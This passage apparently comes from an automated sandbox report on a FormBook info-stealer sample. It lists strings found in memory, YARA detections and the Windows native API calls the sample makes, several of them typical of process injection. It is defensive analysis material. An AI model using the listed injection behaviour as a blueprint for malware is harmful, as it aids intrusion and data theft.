0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a
          Source: wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 1cec9342_by_Libranalysis.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 1cec9342_by_Libranalysis.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.656903720.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041826C NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A10 NtQuerySection,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59560 NtWriteFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A596D0 NtCreateKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59760 NtOpenProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A770 NtOpenThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0041826C NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004182EA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010481C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010483A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01048270 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010482F0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010481BA NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104826C NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010482EA NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00406945
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040711C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00408C5B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041C538
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00402D89
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041C7A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE20A8
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B090
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE28EC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1002
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1F900
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE22AE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4EBB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADDBD2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE2B28
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2841F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADD466
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE25DD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A10D20
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE2D07
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE1D55
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE2EF7
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A36E30
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE1FF1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_00401030
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038DE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03826E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03800D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104C538
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01032D89
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01032D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01038C5B
